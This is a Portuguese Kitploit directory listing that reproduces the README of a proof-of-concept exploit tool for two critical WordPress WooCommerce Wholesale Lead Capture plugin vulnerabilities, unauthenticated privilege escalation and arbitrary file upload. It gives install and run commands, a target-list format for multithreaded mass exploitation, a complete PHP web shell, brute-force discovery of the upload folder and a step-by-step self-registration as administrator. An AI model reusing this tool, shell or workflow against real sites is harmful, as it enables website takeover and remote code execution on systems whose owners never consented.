Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2026-27542-cve-2026-27540-
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2026-27542-cve-2026-27540-

CVE-2026-27542-CVE-2026-27540-

Privilégio sem Autenticação | Upload Arbitrário de Arquivos sem Autenticação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
211há 5 mesesAinda não revisado

SVG de digitação


🔴 Visão Geral da Vulnerabilidade

CVE-2026-27542 — Escalação de Privilégios Não Autenticada

CampoDetalhes
ID CVECVE-2026-27542
GravidadeCRÍTICA — Pontuação CVSS v3.1: 9.8
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Componente AfetadoPlugin WooCommerce Wholesale Lead Capture (WWLC) para WordPress
Tipo de VulnerabilidadeEscalação de Privilégios Não Autenticada
Autenticação NecessáriaNenhuma
CWECWE-269: Gerenciamento Inadequado de Privilégios

Descrição:
O plugin WooCommerce Wholesale Lead Capture para WordPress é vulnerável a Escalação de Privilégios Não Autenticada em todas as versões afetadas conhecidas. A vulnerabilidade existe no manipulador da ação AJAX wwlc_create_user, que processa solicitações de registro de usuário sem sanitizar ou validar adequadamente os campos de função fornecidos pelo usuário. Um atacante remoto e não autenticado pode criar uma solicitação POST especialmente formulada que injeta campos arbitrários de capacidade do WordPress — incluindo wp_capabilities[administrator] — diretamente nos metadados do usuário no momento da criação da conta. Isso permite que o atacante se registre como administrador do WordPress sem qualquer autenticação prévia ou interação de um usuário legítimo, resultando em comprometimento total da instalação do WordPress afetada.


CVE-2026-27540 — Upload Arbitrário de Arquivo Não Autenticado

CampoDetalhes
ID CVECVE-2026-27540
GravidadeCRÍTICA — Pontuação CVSS v3.1: 9.8
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Componente AfetadoPlugin WooCommerce Wholesale Lead Capture (WWLC) para WordPress
Tipo de VulnerabilidadeUpload Arbitrário de Arquivo Não Autenticado (levando a Execução Remota de Código)
Autenticação NecessáriaNenhuma
CWECWE-434: Upload Irrestrito de Arquivo com Tipo Perigoso

Descrição:
O plugin WooCommerce Wholesale Lead Capture para WordPress é vulnerável a Upload Arbitrário de Arquivo Não Autenticado em todas as versões afetadas conhecidas. A vulnerabilidade reside na ação AJAX wwlc_file_upload_handler, que é registrada sem qualquer requisito de autenticação ou verificação de nonce. Ao enviar uma solicitação POST multipart especialmente formulada para /wp-admin/admin-ajax.php, um atacante remoto não autenticado pode enviar arquivos de tipo arbitrário — incluindo web shells PHP — para o diretório wp-content/uploads/ do servidor em um subdiretório wwlc-temp-* gerado dinamicamente. A exploração bem-sucedida leva à Execução Remota de Código (RCE) no servidor web subjacente, operando como a conta de usuário do processo web.


🛠️ Descrição da Ferramenta

Este é um script de exploração Prova de Conceito (PoC) para as duas vulnerabilidades críticas descritas acima, direcionando instalações WordPress que executam o plugin WooCommerce Wholesale Lead Capture. A ferramenta suporta dois modos de ataque independentes:

ModoTipo de AtaqueObjetivo
Modo 1Upload Arbitrário de Arquivo Não Autenticado + Descoberta de pasta por força brutaEnviar um web shell PHP e localizá-lo por meio de adivinhação de pasta em várias camadas
Modo 2Escalação de Privilégios Não Autenticada via RegistroAutorregistrar-se como Administrador do WordPress e verificar o acesso de administrador

📋 Requisitos

Requisitos do Sistema

  • Python 3.8 ou superior
  • Acesso à internet para o(s) alvo(s)
  • Linux / Windows / macOS

Dependências Python

pip install requests urllib3 colorama

Ou instale via arquivo de requisitos:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Instalação

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py

⚙️ Uso

Execução Básica

python3 CVE-2026-27542_CVE-2026-27540.py

A ferramenta apresenta uma interface interativa de terminal. Você será solicitado a fornecer todos os parâmetros necessários.


🗂️ Formato da Lista de Alvos

Crie um arquivo de texto simples (por exemplo, list.txt) com uma URL de destino por linha:

https://target1.com
https://target2.com
http://target3.com/wordpress

🔴 Modo 1 — Upload de Arquivo + Força Bruta de Pasta

Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt

Exemplo de arquivo de shell (shell.php):

<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>

Nota: A pasta wwlc-temp-* é gerada dinamicamente pelo plugin usando uniqid('wwlc-temp-') do PHP. A ferramenta usa uma estratégia de força bruta em várias camadas para descobri-la:

CamadaEstratégiaDescrição
0Listagem de DiretórioTenta listar o diretório de uploads se estiver aberto
1Baseado em PadrãoAdivinhações numéricas sequenciais e derivadas do tempo
2Hex Baseado em TempoSemeadas por carimbos de data/hora observados nas solicitações HTTP
3Hex AleatórioAdivinhação de string hex aleatória pura

🟠 Modo 2 — Registro + Injeção de Função + Verificação de Admin

Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:

A ferramenta:

  1. Descobre o formulário de registro do WWLC e extrai um nonce válido
  2. Envia um payload de registro especialmente elaborado, injetando a função administrator
  3. Tenta fazer login com as credenciais criadas
  4. Verifica o acesso ao painel administrativo em vários endpoints administrativos do WordPress
  5. Salva os acessos de administrador confirmados no arquivo de saída

📁 Arquivos de Saída

Baixar ferramenta